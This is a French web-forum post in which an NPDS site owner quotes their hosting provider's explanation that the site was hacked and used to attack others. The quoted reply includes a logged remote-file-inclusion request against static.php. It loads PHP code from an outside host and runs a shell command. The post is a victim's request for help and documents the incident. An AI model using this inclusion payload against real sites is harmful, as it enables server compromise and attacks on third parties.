Index du Forum » » Sécurité

Auteur

[Résolu] - NPDS hacké !
Anonyme
19853  

  Posté : 23-10-2005 00:30

Citation : Anonyme 

Oufti ... voici ce que me répond mon hébergeur ...




Bonjour,



,- - [ Le samedi 21 février 2004 vers 15:44 tanatloc écrivait: ] - -

|

> Que voulez-vous dire ?

> Votre serveur s'est fait hacké à cause de certains CMOD 777 placés sur mon

> site ???

|

`- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



Il ne s'agit pas pour nous d'un hacking de notre serveur, seul votre site est concerné.



Nous ne pouvons affirmer que l'usage qui a été fait de votre site était un hacking ou une fonction volontaire, mais il est probable à 99% que ce soit un hacking...



Dans le cas du hacking (vous seul savez si l'usage qui a été fait de votre site d'attaquer des tiers est l'usage normal que vous souhaitez pour votre site ou non), cela signifie que certains de vos scripts/pages contiennent des trous de sécurité permettant à des tiers d'en faire un usage différent de ce que vous souhaitez.



Le cas concret mentionné dans le log précité concerne la page "/static.php" de votre site, qui a été appelée de la façon suivante :



/static.php?op=http://hack0.tripod.com.br/cse.gif?&cmd=id



Si vous visitez http://hack0.tripod.com.br/cse.gif vous constaterez qu'il s'agit de code php, qui a probablement été placé en !!include!! par votre script et donc exécuté.



Bien à vous...








Heeeeelp que puis-je faire ???  



Cet article provient de NPDS

http://www.npds.org/viewtopic.php?topic=10213&forum=12